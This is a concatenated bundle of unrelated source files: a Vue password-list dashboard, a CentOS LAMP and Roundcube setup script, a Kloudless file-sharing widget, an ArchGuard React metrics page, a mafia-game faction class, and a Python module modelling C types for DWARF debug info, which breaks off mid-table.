                                    Show Password
                                </button>
                                <button class="ui primary labeled icon button" @click="copyPassword(password.id)">
                                    <i class="copy icon"></i>
                                    Copy Password
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </article>
        <div id="password_copy_container">
            <button id="copy_trigger" data-clipboard-text="{{ hiddenPassword }}"></button>
        </div>
    `,
    data() {
        return {
            activePassword: {},   // password whose details are expanded in list view
            layout: 'grid',       // 'grid' | 'list'
            filter: '',           // name filter applied to folders and passwords
            hiddenPassword: '',   // decoded password staged for clipboard copy
            breadcrumb: [],       // folders on the path from root to the current folder
            folders: [],
            passwords: []
        }
    },
    ready() {
        // Folder id 1 is the root folder.
        this.loadContents(1);
        // Defer so the hidden #copy_trigger button exists before binding Clipboard.
        setTimeout(() => new Clipboard('#copy_trigger'), 500);
    },
    methods: {
        setLayout(layout) {
            this.layout = layout;
        },
        // Descend into a folder and extend the breadcrumb trail.
        openFolder(folder) {
            this.loadContents(folder.id);
            this.breadcrumb.push(folder);
        },
        // Jump to an ancestor folder (or root) from the breadcrumb,
        // truncating the trail past the clicked entry.
        openBreadcrumbFolder(folder) {
            if (folder === 'root') {
                this.breadcrumb = [];
                this.loadContents(1);
            } else {
                if (this.breadcrumb[this.breadcrumb.length - 1] != folder) {
                    let position = this.breadcrumb.indexOf(folder);
                    this.breadcrumb.splice(position + 1);
                }
                this.loadContents(folder.id);
            }
        },
        // Expand the details panel for a password in list view.
        showPasswordDetails(password) {
            this.activePassword = password;
        },
        loadContents(folderId) {
            this.loadFolders(folderId);
            this.loadPasswords(folderId);
        },
        loadFolders(folderId) {
            this.folders = [];
            $q.get(`/api/folder/${folderId}/folders`)
                .success(({data}) => {
                    this.folders = data;
                });
        },
        loadPasswords(folderId) {
            this.passwords = [];
            $q.get(`/api/folder/${folderId}/passwords`)
                .success(({data}) => {
                    this.passwords = data;
                });
        },
        // Reveal the decoded password in the UI for three seconds.
        showPassword(id) {
            let el = $(`#password_${id}`);
            let password = '';
            this.passwords.forEach((item) => {
                if (item.id == id)
                    password = item.password;
            });
            el.html(atob(password));
            setTimeout(() => {el.html('******')}, 3000);
        },
        // Stage the decoded password on the hidden trigger button and fire a
        // click so clipboard.js copies it, then clear the staging field.
        copyPassword(id) {
            let password = '';
            this.passwords.forEach((item) => {
                if (item.id == id)
                    password = item.password;
            });
            // BUG FIX: the stored value is base64 (see showPassword); the
            // original line was corrupted to `<PASSWORD>(password)`, which is
            // a syntax error. Decode with atob, matching showPassword.
            this.hiddenPassword = atob(password);
            setTimeout(() => {$('#copy_trigger').click()}, 50);
            toastr.info('Copied password to clipboard');
            setTimeout(() => {this.hiddenPassword = ''}, 100);
        }
    }
});
// Minimal search screen: a single full-width input. No behavior is wired up
// in this component yet.
let Search = Vue.extend({
    template: `
    <div class="ui big fluid input">
        <input type="text" placeholder="Search...">
    </div>`
});
// Root component shell; the concrete screens are supplied by the router.
let App = Vue.extend({});

// Map routes to screen components (vue-router 0.x API: map + start).
let router = new VueRouter();
router.map({
    '/passwords': {
        component: Passwords
    },
    '/search': {
        component: Search
    }
});

// Mount the routed app onto the dashboard page container.
router.start(App, '#dashboardPage');
//# sourceMappingURL=dashboard.min.js.map
|
#!/bin/bash
# LAMP + PHP (remi) setup for CentOS 7, preparing a Roundcube deployment.
# BUG FIX: the shebang was buried on line 3 of the original, where the kernel
# never reads it; it must be the first line of the file.

# refresh repositories
yum update -y
# install packages (interactive — these prompts require confirmation;
# add -y if unattended installation is desired)
yum install httpd httpd-tools mariadb-server mariadb php php-fpm php-mysqlnd php-opcache php-gd php-xml php-mbstring php-json php-intl php-ldap
yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
yum update && yum install epel-release
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm
yum install yum-utils

# BUG FIX: plain `echo "...\n"` prints a literal backslash-n; -e is required
# for the escape sequences to be interpreted (applied to every echo below
# whose string contains \n).
echo -e "Ingrese la versión de su php Ejemplo si es 7.4 o 7.4.1 ingrese 74\n"
php -v
echo -e "\n"
read version_php
yum-config-manager --enable remi-php$version_php
yum install php-opcache

# start services now and on boot
systemctl start httpd
systemctl start mariadb
systemctl enable httpd
systemctl enable mariadb

# open HTTP in the firewall
firewall-cmd --permanent --add-service=http
firewall-cmd --reload

echo -e "Es necesario configurar la base de datos y configurar, para ello ejecute el comando <mysql_secure_installation>\n"
echo -e "Finalizada la configuración iniciaremos sesión con <mysql -u root -p> y ejecutaremos los siguientes comandos:\n"
echo -e "create database roundcubedb;
create user roundcubeuser@localhost identified by 'roundcubepwd';
grant all on roundcubedb.* to roundcubeuser@localhost;
flush privileges;
exit;\n"
|
;(function() {
  // Kloudless application ID used to initialise the dropzone widget.
  var kloudlessAppID = "iCZ_ICMy43H0NSoz0QbLvmyjzCHf2frAOPaBfWVgh9_vrFIM";
  /*
   * element: jQuery DOM element to bind the dropzone to. Requires an ID.
   */
  var fs = window.FileSharer = function(element, successHandler) {
    this.element = element;
    this.successHandler = successHandler;
    this.init();
  };
  // Create the Kloudless dropzone bound to the element's ID and hook up the
  // success callback, if one was provided.
  fs.prototype.init = function() {
    this.dropzone = window.Kloudless.dropzone({
      app_id: kloudlessAppID,
      elementId: this.element.attr('id'), // Element to bind the dropzone to
      multiselect: true, // To upload more than 1 file.
      // The options below apply to the File Explorer that appears when the
      // dropzone is clicked.
      computer: true,
      link: true,
      // NOTE(review): this.linkOptions is never assigned before init runs, so
      // this is presumably undefined on first construction — confirm intended
      // (setLinkOptions pushes real options afterwards).
      link_options: this.linkOptions,
      services: ['all'],
      types: ['all'],
    });
    if (this.successHandler)
      this.dropzone.on('success', this.successHandler);
  };
  // Push new link options (e.g. password/expiration) into the dropzone.
  fs.prototype.setLinkOptions = function(opts) {
    this.dropzone.update({
      link_options: opts
    });
  };
})();
// jQuery UI widget wrapping FileSharer; exposes 'password' and 'expiration'
// as widget options and re-applies them to the dropzone whenever they change.
$.widget("custom.filesharer", {
  // jQuery widget attributes/methods.
  options: {
    password: null,
    expiration: null,
  },
  _create: function() {
    var self = this;
    // Forward Kloudless upload successes as a 'complete' widget event.
    self.fs = new window.FileSharer(self.element, function(files) {
      self._trigger("complete", null, {files: files});
    });
    self.reload();
  },
  _setOptions: function( options ) {
    this._super(options);
    this.reload();
  },
  // Custom attributes/methods.
  _getLinkOptions: function() {
    return {
      direct: false,
      password: this.options.password,
      expiration: this.options.expiration,
    }
  },
  // Re-sync the current widget options onto the dropzone's link options.
  reload: function() {
    this.fs.setLinkOptions(this._getLinkOptions());
  },
});
$(document).ready(function() {
  // Build the file-sharing widget; on each completed upload render one result
  // row per file with its share link, expiration and password.
  var $fs = $("#dropzone").filesharer({
    complete: function(event, data) {
      if (!data.files || data.files.length === 0)
        return;
      $("#results").empty();
      var rowTmpl = $.templates("#resultRowTempl");
      $.each(data.files, function(i, file) {
        var rowHtml = rowTmpl.render({
          name: file.name,
          url: file.link,
          expiration: $fs.option("expiration"),
          // Restored: read the current password option off the widget (the
          // source had been mangled here; mirrors the expiration line above).
          password: $fs.option("password"),
        });
        $("#results").append(rowHtml);
      });
      $("#results-wrapper").show();
    }
  }).data("custom-filesharer");
  // Expiration picker: push the chosen timestamp into the widget options.
  $("#expiration").datetimepicker({
    format: "Y-m-d H:i:00O",
    step: 15,
    allowBlank: true,
    onChangeDateTime: function(dp, $input) {
      $fs.option('expiration', $input.val())
    },
  });
  // Keep the widget's password option in sync with the input field.
  $("#password").change(function() {
    $fs.option('password', $(this).val());
  });
  // Swap the cover screen for the uploader.
  $("#start").click(function() {
    $("#cover-wrapper").hide();
    $("#explorer-wrapper").show();
  });
});
<filename>archguard/src/pages/system/metrics/Dfms.tsx
import React, { useState } from "react";
import { Select, Row, Col, Button, Radio, Cascader, Form } from "antd";
import { useMount } from "react-use";
import Echarts, { ECharts } from "echarts";
import { getChartsOption } from "./chartsUtils";
import {
transformCodeTreeToModuleOptions,
transformCodeTreeToCascaderOptions,
} from "@/utils/utils";
import useCodeTree from "@/store/global-cache-state/useCodeTree";
import { SelectValue } from "antd/lib/select";
import { Store } from "antd/lib/form/interface";
import { queryDFMSMetricBy, DFMSMetric } from "@/api/module/codeTree";
import { useForm } from "antd/lib/form/Form";
import { storage } from "@/store/storage/sessionStorage";
import { useParams } from "umi";
// Maps the radio-button values (the module/package average field names) onto
// the differently named fields used by class-level metrics.
// NOTE(review): "Insibility" looks like a typo for "Instability"; kept as-is
// because renaming would touch every usage site.
enum ClassInsibilityKey {
  innerInstabilityAvg = "innerInstability",
  outerInstabilityAvg = "outerInstability",
}
// Page state shape: which code-tree level is queried and which instability
// average is charted.
interface Dfms {
  key: "module" | "package" | "class";
  stability: "innerInstabilityAvg" | "outerInstabilityAvg";
}
// Module-level ECharts instance, initialised once in useMount below.
let DFMSCharts: ECharts;
/**
 * DFMS metric page: query instability metrics for a module / package / class
 * picked from the cached code tree, and chart the selected average.
 */
const Dfms = () => {
  const [codeTree] = useCodeTree(parseInt(storage.getSystemId()));
  // Option lists per query level, derived from the cached code tree.
  const options = {
    module: transformCodeTreeToModuleOptions(codeTree?.value!),
    package: transformCodeTreeToCascaderOptions(codeTree?.value!, false),
    class: transformCodeTreeToCascaderOptions(codeTree?.value!, true),
  };
  const [currentKey, setCurrentKey] = useState<Dfms["key"]>("module");
  const [currentModule, setCurrentModule] = useState<SelectValue>();
  const [currentStability, setCurrentStability] = useState<Dfms["stability"]>(
    "outerInstabilityAvg",
  );
  const [dfmsMetric, setDFMSMetric] = useState<DFMSMetric>();
  const [form] = useForm();
  // Initialise the chart once the #container div is mounted.
  useMount(() => {
    DFMSCharts = Echarts.init(document.getElementById("container") as HTMLDivElement);
    DFMSCharts.setOption(getChartsOption());
  });
  // Re-render the chart when the user toggles inner/outer instability.
  // Class-level results use differently named fields, hence the key mapping.
  const onStabilityChange = (value: Dfms["stability"]) => {
    setCurrentStability(value);
    const currentInstability =
      currentKey === "class" ? dfmsMetric![ClassInsibilityKey[value]] : dfmsMetric![value];
    DFMSCharts.setOption(getChartsOption([currentInstability, dfmsMetric!.absRatio]));
  };
  const onFinish = (values: Store) => {
    // Cascader values arrive as string arrays; flatten them to dotted paths.
    // (forEach, not map: `values` is mutated in place and the result ignored.)
    Object.keys(values).forEach((key) => {
      const current = values[key];
      values[key] = typeof current === "string" ? current : current.join(".");
    });
    queryDFMSMetricBy(currentKey, values).then((res: DFMSMetric) => {
      setDFMSMetric({ ...res });
      const currentInstability =
        currentKey === "class" ? res[ClassInsibilityKey[currentStability]] : res[currentStability];
      DFMSCharts.setOption(getChartsOption([currentInstability, res.absRatio]));
    });
  };
  return (
    <div>
      <Radio.Group
        style={{ marginBottom: "12px" }}
        value={currentKey}
        onChange={({ target: { value } }) => setCurrentKey(value)}
      >
        <Radio.Button value="module">module</Radio.Button>
        <Radio.Button value="package">package</Radio.Button>
        <Radio.Button value="class">class</Radio.Button>
      </Radio.Group>
      <Form form={form} onFinish={onFinish}>
        <Row gutter={12}>
          <Col span={8}>
            <Form.Item
              name="moduleName"
              rules={[
                {
                  required: true,
                  message: "请选择模块",
                },
              ]}
            >
              <Select
                placeholder="模块"
                style={{ width: "100%" }}
                allowClear
                showSearch
                onChange={(value) => {
                  {/* Changing module invalidates the package/class picks. */}
                  form.setFieldsValue({
                    moduleName: value,
                    packageName: [],
                    className: [],
                  });
                  setCurrentModule(value);
                }}
              >
                {options["module"].map(({ value, label }) => {
                  return (
                    <Select.Option value={value} key={value}>
                      {label}
                    </Select.Option>
                  );
                })}
              </Select>
            </Form.Item>
          </Col>
          {currentKey === "package" ? (
            <Col flex="auto">
              <Form.Item
                name="packageName"
                rules={[
                  {
                    required: true,
                    message: "请选择包名",
                  },
                ]}
              >
                <Cascader
                  changeOnSelect
                  style={{ width: "100%" }}
                  displayRender={(label) => label.join(".")}
                  options={options["package"][currentModule as string]}
                  placeholder="包名"
                  notFoundContent="请先选择模块!"
                />
              </Form.Item>
            </Col>
          ) : currentKey === "class" ? (
            <Col flex="auto">
              <Form.Item
                name="className"
                rules={[
                  {
                    required: true,
                    message: "请选择类名",
                  },
                ]}
              >
                <Cascader
                  style={{ width: "100%" }}
                  displayRender={(label) => label.join(".")}
                  options={options["class"][currentModule as string]}
                  placeholder="类名"
                  notFoundContent="请先选择模块!"
                />
              </Form.Item>
            </Col>
          ) : undefined}
          <Col flex="80px">
            <Form.Item>
              <Button type="primary" htmlType="submit">
                查询
              </Button>
            </Form.Item>
          </Col>
        </Row>
      </Form>
      <div style={{ textAlign: "center" }}>
        <Radio.Group
          value={currentStability}
          onChange={({ target: { value } }) => onStabilityChange(value)}
        >
          <Radio.Button value="outerInstabilityAvg" disabled={!dfmsMetric}>
            外部不稳定性
          </Radio.Button>
          <Radio.Button value="innerInstabilityAvg" disabled={!dfmsMetric}>
            内部不稳定性
          </Radio.Button>
        </Radio.Group>
      </div>
      <div
        id="container"
        style={{
          width: "800px",
          height: "800px",
          margin: "0 auto",
        }}
      ></div>
    </div>
  );
};
export default Dfms;
|
<reponame>jrfaller/maracas
package main.unused.superclassRemoved;
/**
 * Empty abstract class; given its package ({@code main.unused.superclassRemoved})
 * this is presumably a fixture for the "superclass removed" breaking-change
 * scenario — confirm against the test harness.
 */
public abstract class SuperclassRemovedAbs {
}
|
<reponame>AriusX7/godfather
import Faction from '@mafia/structures/Faction';
import type Player from '@mafia/structures/Player';
/**
 * The Witch: an independent faction. A witch wins alone while still alive
 * once no living Town players remain.
 */
export default class WitchFaction extends Faction {
	public name = 'Witch';
	public independent = true;
	public winCondition = 'game/factions:witchWinCondition';

	public hasWonIndependent(player: Player) {
		// A dead witch cannot win.
		if (!player.isAlive) return false;
		// Win exactly when every Town member is dead.
		const anyTownAlive = player.game.players.some(
			(member) => member.role.faction.name === 'Town' && member.isAlive,
		);
		return !anyTownAlive;
	}
}
|
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import dwarf
from . import pyinternals
RefType = dwarf.FORM_ref4
class CType:
    """Base class for modelled C types.

    Subclasses implement ``_die`` (build the DWARF debug-info entry),
    ``size`` and ``typestr``; this base provides memoised DIE creation plus
    hashing/printing based on the rendered C declaration string.
    """
    def die(self,dcu,abi,st,cache):
        # Memoised wrapper around _die: equal CType values share a single
        # DWARF DIE, which is also appended to the compilation unit.
        if cache is None: cache = {}
        r = cache.get(self)
        if r is None:
            r = self._die(dcu,abi,st,cache)
            cache[self] = r
            dcu.children.append(r)
        return r
    def _die(self,dcu,abi,st,cache):
        # Subclass hook: create the dwarf.DIE for this type.
        raise NotImplementedError()
    def __hash__(self):
        # Hash via the declaration string so equal types collapse in caches.
        return hash(str(self))
    def __str__(self):
        return self.typestr('')
    def size(self,abi):
        # Size in bytes under the given ABI.
        raise NotImplementedError()
    def typestr(self,deriv):
        # Render a C declaration of this type applied to declarator 'deriv'.
        raise NotImplementedError()
def append_deriv(x,deriv):
    """Join a type name with a declarator, omitting the separating space when
    the declarator is empty: ('int','*p') -> 'int *p', ('int','') -> 'int'."""
    if not deriv:
        return x
    return '{} {}'.format(x,deriv)
# noinspection PyAbstractClass
class BasicType(CType):
    """A type spelled as a plain name (no derived syntax); subclasses supply
    the name via full_name()."""
    def full_name(self):
        raise NotImplementedError()
    def typestr(self,deriv):
        return append_deriv(self.full_name(),deriv)
class TVoid(BasicType):
    """The C 'void' type; it has no size."""
    def full_name(self):
        return 'void'
    def __repr__(self):
        return 'TVoid()'
    def __eq__(self,b):
        # All TVoid instances are interchangeable.
        return isinstance(b,TVoid)
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        # DWARF has no dedicated void entry; model it as an unspecified type.
        return dwarf.DIE('unspecified_type',name=st['void'])
    def size(self,abi):
        raise TypeError('"void" does not have a size')
# Shared instance (all TVoid values compare equal anyway).
t_void = TVoid()
class TInt(BasicType):
    """An integer type whose size depends on the ABI.

    f_size is a callable taking the ABI and returning the byte size, so one
    TInt can describe e.g. 'long' across different ABIs.
    """
    def __init__(self,base_name,f_size,signed):
        self.base_name = base_name
        self.f_size = f_size
        self.signed = signed
    def full_name(self):
        r = self.base_name
        if not self.signed: r = 'unsigned ' + r
        return r
    def __repr__(self):
        return 'TInt({!r},{!r},{!r})'.format(self.base_name,self.f_size,self.signed)
    def __eq__(self,b):
        # The size callables are assumed equivalent when the names match.
        return isinstance(b,TInt) and self.base_name == b.base_name and self.signed == b.signed
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        return dwarf.DIE('base_type',
            name=st[self.__str__()],
            encoding=dwarf.ATE.signed if self.signed else dwarf.ATE.unsigned,
            byte_size=dwarf.FORM_data1(self.f_size(abi)))
    def size(self,abi):
        return self.f_size(abi)
# The standard ABI-sized integer types.
t_int = TInt('int',(lambda abi: abi.int_size),True)
t_uint = TInt(t_int.base_name,t_int.f_size,False)
t_long = TInt('long',(lambda abi: abi.long_size),True)
t_ulong = TInt(t_long.base_name,t_long.f_size,False)
class TFixedSizeBase(BasicType):
    """A base type with a fixed byte size (e.g. the char variants).

    d_encoding is the DWARF ATE encoding to emit for the type.
    """
    def __init__(self,name,size,signed,d_encoding):
        self.name = name
        self._size = size
        self.signed = signed
        self.d_encoding = d_encoding
    def full_name(self):
        return self.name
    def __repr__(self):
        # Fixed: previously formatted self.size (the bound method object)
        # instead of the stored byte size.
        return 'TFixedSizeBase({!r},{},{!r},{!r})'.format(self.name,self._size,self.signed,self.d_encoding)
    def __eq__(self,b):
        # Fixed: previously compared self.name against b.base, an attribute
        # this class does not have (raising AttributeError on comparison with
        # another TFixedSizeBase); names identify these types.
        return isinstance(b,TFixedSizeBase) and self.name == b.name
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        return dwarf.DIE('base_type',
            name=st[self.name],
            encoding=self.d_encoding,
            byte_size=dwarf.FORM_data1(self._size))
    def size(self,abi):
        return self._size
# The three distinct C char types (plain char is signed here).
t_char = TFixedSizeBase('char',1,True,dwarf.ATE.signed_char)
t_schar = TFixedSizeBase('signed char',1,True,dwarf.ATE.signed_char)
t_uchar = TFixedSizeBase('unsigned char',1,False,dwarf.ATE.unsigned_char)
class TConst(CType):
    """A const-qualified wrapper around another type."""
    def __init__(self,base):
        # Collapsing const-of-const keeps declaration strings canonical.
        assert not isinstance(base,TConst)
        self.base = base
    def typestr(self,deriv):
        return self.base.typestr(append_deriv('const',deriv))
    def __repr__(self):
        return 'TConst({!r})'.format(self.base)
    def __eq__(self,b):
        # Fixed: the isinstance check previously tested TPtr, making a TConst
        # compare equal to a pointer with the same base type.
        return isinstance(b,TConst) and self.base == b.base
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        return dwarf.DIE('const_type',type=RefType(self.base.die(dcu,abi,st,cache)))
    def size(self,abi):
        # const-ness does not change size.
        return self.base.size(abi)
class TPtr(CType):
    """A pointer to another type."""
    def __init__(self,base):
        self.base = base
    def typestr(self,deriv):
        # Pointers prepend '*' to the declarator: int *x, char **p, ...
        return self.base.typestr('*'+deriv)
    def __repr__(self):
        return 'TPtr({!r})'.format(self.base)
    def __eq__(self,b):
        return isinstance(b,TPtr) and self.base == b.base
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        return dwarf.DIE('pointer_type',
            type=RefType(self.base.die(dcu,abi,st,cache)),
            byte_size=dwarf.FORM_data1(abi.ptr_size))
    def size(self,abi):
        # All data pointers share the ABI pointer size.
        return abi.ptr_size
class TArray(CType):
    """A fixed-length array of another type."""
    def __init__(self,base,length):
        assert length > 0
        self.base = base
        self.length = length
    def typestr(self,deriv):
        # Array binds tighter than pointer, so a non-empty declarator is
        # parenthesised: int (*x)[3] vs int x[3].
        part = '[{}]'.format(self.length)
        return self.base.typestr('({}){}'.format(deriv,part) if deriv else part)
    def __repr__(self):
        return 'TArray({!r},{})'.format(self.base,self.length)
    def __eq__(self,b):
        return isinstance(b,TArray) and self.base == b.base and self.length == b.length
    __hash__ = CType.__hash__
    def _die(self,dcu,abi,st,cache):
        r = dwarf.DIE('array_type',
            type=RefType(self.base.die(dcu,abi,st,cache)))
        # DWARF expresses the length as an inclusive upper bound.
        r.children.append(dwarf.DIE('subrange_type',
            type=RefType(t_ulong.die(dcu,abi,st,cache)),
            upper_bound=dwarf.smallest_data_form(self.length-1)))
        return r
    def size(self,abi):
        return self.base.size(abi) * self.length
class TFunc(CType):
    """A function type: positional parameter types plus a return type."""
    def __init__(self,params,returns):
        self.params = params
        self.returns = returns
    def typestr(self,deriv):
        return '{} ({})({})'.format(str(self.returns),deriv,','.join(map(str,self.params)))
    def size(self,abi):
        raise TypeError("it does not make sense to ask a function's size")
    # This method throws an instance of ValueError and not NotImplementedError
    # because it is not an abstract method. It simply hasn't been written, but
    # it may be useful in the future to implement it.
    def _die(self,dcu,abi,st,cache):
        raise ValueError('not implemented')
class Attribute:
    """A struct member: its name, its CType and its byte offset."""
    def __init__(self,name,datatype,offset):
        self.name = name
        self.datatype = datatype
        self.offset = offset
class TStruct(BasicType):
    """A C struct; members (Attribute instances) may be filled in lazily."""
    def __init__(self,name,attrs=None):
        self.name = name
        self._attrs = ()
        self.attr_lookup = {}
        if attrs is not None:
            self.attrs = attrs
    @property
    def attrs(self):
        return self._attrs
    @attrs.setter
    def attrs(self,val):
        # Keep the by-name lookup table in sync with the attribute list.
        self._attrs = val
        self.attr_lookup = {a.name: a for a in val}
    def full_name(self):
        if self.name:
            return 'struct ' + self.name
        return '<anonymous struct>'
    # NOTE: for now, this just mimics void, since we don't really need a full
    # implementation
    def _die(self,dcu,abi,st,cache):
        return t_void.die(dcu,abi,st,cache)
    def size(self,abi):
        raise ValueError('not implemented')
class TTypedef(BasicType):
    """A typedef: a new name for an existing type; size defers to the base."""
    def __init__(self,name,base):
        self.name = name
        self.base = base
    def full_name(self):
        return self.name
    def size(self,abi):
        return self.base.size(abi)
    def _die(self,dcu,abi,st,cache):
        return dwarf.DIE('typedef',
            name=st[self.name],
            type=RefType(self.base.die(dcu,abi,st,cache)))
def real_type(x):
    """Follow typedef chains down to the underlying (non-typedef) type."""
    return real_type(x.base) if isinstance(x,TTypedef) else x
def real_isinstance(x,t):
    # isinstance that sees through typedefs.
    return isinstance(real_type(x),t)
def stripped_type(x):
    # Strip typedefs, pointers and const qualifiers down to the core type.
    while isinstance(x,(TTypedef,TPtr,TConst)):
        x = x.base
    return x
def typedef_struct(typedef,name=None):
    # Convenience for "typedef struct name typedef;" (anonymous when name is
    # None).
    return TTypedef(typedef,TStruct(name))
# Opaque CPython / JIT structs: only the names matter at this point; the
# members actually needed are attached later via set_attrs.
PyObject = typedef_struct('PyObject','_object')
PyVarObject = typedef_struct('PyVarObject')
PyTypeObject = typedef_struct('PyTypeObject','_typeobject')
PyListObject = typedef_struct('PyListObject')
PyTupleObject = typedef_struct('PyTupleObject')
PyFrameObject = typedef_struct('PyFrameObject','_frame')
PyThreadState = typedef_struct('PyThreadState','_ts')
PyCellObject = typedef_struct('PyCellObject')
PyMethodObject = typedef_struct('PyMethodObject')
CompiledCode = typedef_struct('CompiledCode','_CompiledCode')
FunctionBody = typedef_struct('FunctionBody')
Function = typedef_struct('Function')
Generator = typedef_struct('Generator')
PyDictObject = typedef_struct('PyDictObject')
PyCodeObject = typedef_struct('PyCodeObject')
# Common pointer and integer aliases used by the signature table below.
t_void_ptr = TPtr(t_void)
PyObject_ptr = TPtr(PyObject)
PyTypeObject_ptr = TPtr(PyTypeObject)
# Modelled as a plain void* rather than the real function-pointer type.
Py_tracefunc = t_void_ptr
PyThreadState_ptr = TPtr(PyThreadState)
PyFrameObject_ptr = TPtr(PyFrameObject)
PyCodeObject_ptr = TPtr(PyCodeObject)
PyDictObject_ptr = TPtr(PyDictObject)
const_char_ptr = TPtr(TConst(t_char))
Function_ptr = TPtr(Function)
FunctionBody_ptr = TPtr(FunctionBody)
Py_ssize_t = t_long
size_t = t_ulong
def set_attrs(t,attrs):
    """Attach members to a struct typedef; offsets come from the running
    interpreter (pyinternals.member_offsets) and the result is sorted by
    offset."""
    real_type(t).attrs = sorted(
        (Attribute(name,datatype,pyinternals.member_offsets[t.name][name]) for name,datatype in attrs),
        key=(lambda a: a.offset))
# Only the members actually inspected elsewhere are declared.
set_attrs(PyObject,[
    ('ob_refcnt',Py_ssize_t),
    ('ob_type',PyTypeObject_ptr)
])
set_attrs(PyVarObject,[
    ('ob_size',Py_ssize_t)
])
set_attrs(PyTypeObject,[
    ('tp_dealloc',t_void_ptr),
    ('tp_iternext',t_void_ptr),
    ('tp_flags',t_void_ptr)
])
set_attrs(PyTupleObject,[
    ('ob_item',t_void_ptr)
])
func_signatures = {
'PyMem_Malloc' : TFunc([size_t],t_void_ptr),
'Py_IncRef' : TFunc([PyObject_ptr],t_void),
'Py_DecRef' : TFunc([PyObject_ptr],t_void),
'Py_AddPendingCall' : TFunc([TPtr(TFunc([t_void_ptr],t_int)),t_void_ptr],t_int),
'PyDict_GetItem' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyDict_SetItem' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyDict_DelItem' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyDict_GetItemString' : TFunc([PyObject_ptr,const_char_ptr],PyObject_ptr),
'PyDict_Size' : TFunc([PyObject_ptr],Py_ssize_t),
'PyDict_Copy' : TFunc([PyObject_ptr],PyObject_ptr),
'PyDict_New' : TFunc([],PyObject_ptr),
'_PyDict_NewPresized' : TFunc([Py_ssize_t],PyObject_ptr),
'_PyDict_LoadGlobal' : TFunc([PyDictObject_ptr,PyDictObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_IsSubclass' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyObject_GetItem' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_SetItem' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyObject_DelItem' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyObject_GetIter' : TFunc([PyObject_ptr],PyObject_ptr),
'PyObject_GetAttr' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_SetAttr' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyObject_IsTrue' : TFunc([PyObject_ptr],t_int),
'PyObject_RichCompare' : TFunc([PyObject_ptr,PyObject_ptr,t_int],t_int),
'PyObject_Call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_CallObject' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyEval_GetGlobals' : TFunc([],t_void),
'PyEval_GetBuiltins' : TFunc([],t_void),
'PyEval_GetLocals' : TFunc([],t_void),
'PyEval_AcquireThread' : TFunc([],t_void),
'_PyEval_SignalAsyncExc' : TFunc([],t_void),
'PyErr_Occurred' : TFunc([],t_void),
'PyErr_ExceptionMatches' : TFunc([],t_void),
'PyErr_Clear' : TFunc([],t_void),
'PyErr_Format' : TFunc([],t_void),
'PyErr_SetString' : TFunc([],t_void),
'PyErr_Fetch' : TFunc([],t_void),
'PyErr_Restore' : TFunc([],t_void),
'PyErr_NormalizeException' : TFunc([],t_void),
'PyException_SetTraceback' : TFunc([],t_void),
'PyNumber_Multiply' : TFunc([],t_void),
'PyNumber_TrueDivide' : TFunc([],t_void),
'PyNumber_FloorDivide' : TFunc([],t_void),
'PyNumber_Add' : TFunc([],t_void),
'PyNumber_Subtract' : TFunc([],t_void),
'PyNumber_Lshift' : TFunc([],t_void),
'PyNumber_Rshift' : TFunc([],t_void),
'PyNumber_And' : TFunc([],t_void),
'PyNumber_Xor' : TFunc([],t_void),
'PyNumber_Or' : TFunc([],t_void),
'PyNumber_InPlaceMultiply' : TFunc([],t_void),
'PyNumber_InPlaceTrueDivide' : TFunc([],t_void),
'PyNumber_InPlaceFloorDivide' : TFunc([],t_void),
'PyNumber_InPlaceRemainder' : TFunc([],t_void),
'PyNumber_InPlaceAdd' : TFunc([],t_void),
'PyNumber_InPlaceSubtract' : TFunc([],t_void),
'PyNumber_InPlaceLshift' : TFunc([],t_void),
'PyNumber_InPlaceRshift' : TFunc([],t_void),
'PyNumber_InPlaceAnd' : TFunc([],t_void),
'PyNumber_InPlaceXor' : TFunc([],t_void),
'PyNumber_InPlaceOr' : TFunc([],t_void),
'PyNumber_Positive' : TFunc([],t_void),
'PyNumber_Negative' : TFunc([],t_void),
'PyNumber_Invert' : TFunc([],t_void),
'PyNumber_Remainder' : TFunc([],t_void),
'PyNumber_Power' : TFunc([],t_void),
'PyLong_AsLong' : TFunc([],t_void),
'PyLong_FromLong' : TFunc([],t_void),
'PyList_New' : TFunc([],t_void),
'PyList_Append' : TFunc([],t_void),
'PyTuple_New' : TFunc([],t_void),
'PyTuple_Pack' : TFunc([],t_void),
'PySet_Add' : TFunc([],t_void),
'PySet_New' : TFunc([],t_void),
'PySlice_New' : TFunc([],t_void),
'PySequence_Contains' : TFunc([],t_void),
'PyTraceBack_Here' : TFunc([],t_void),
'PyUnicode_Format' : TFunc([],t_void),
'PyUnicode_Append' : TFunc([],t_void),
'PyUnicode_Concat' : TFunc([],t_void),
'PyCell_Get' : TFunc([],t_void),
'PyCell_Set' : TFunc([],t_void),
'PyCell_New' : TFunc([],t_void),
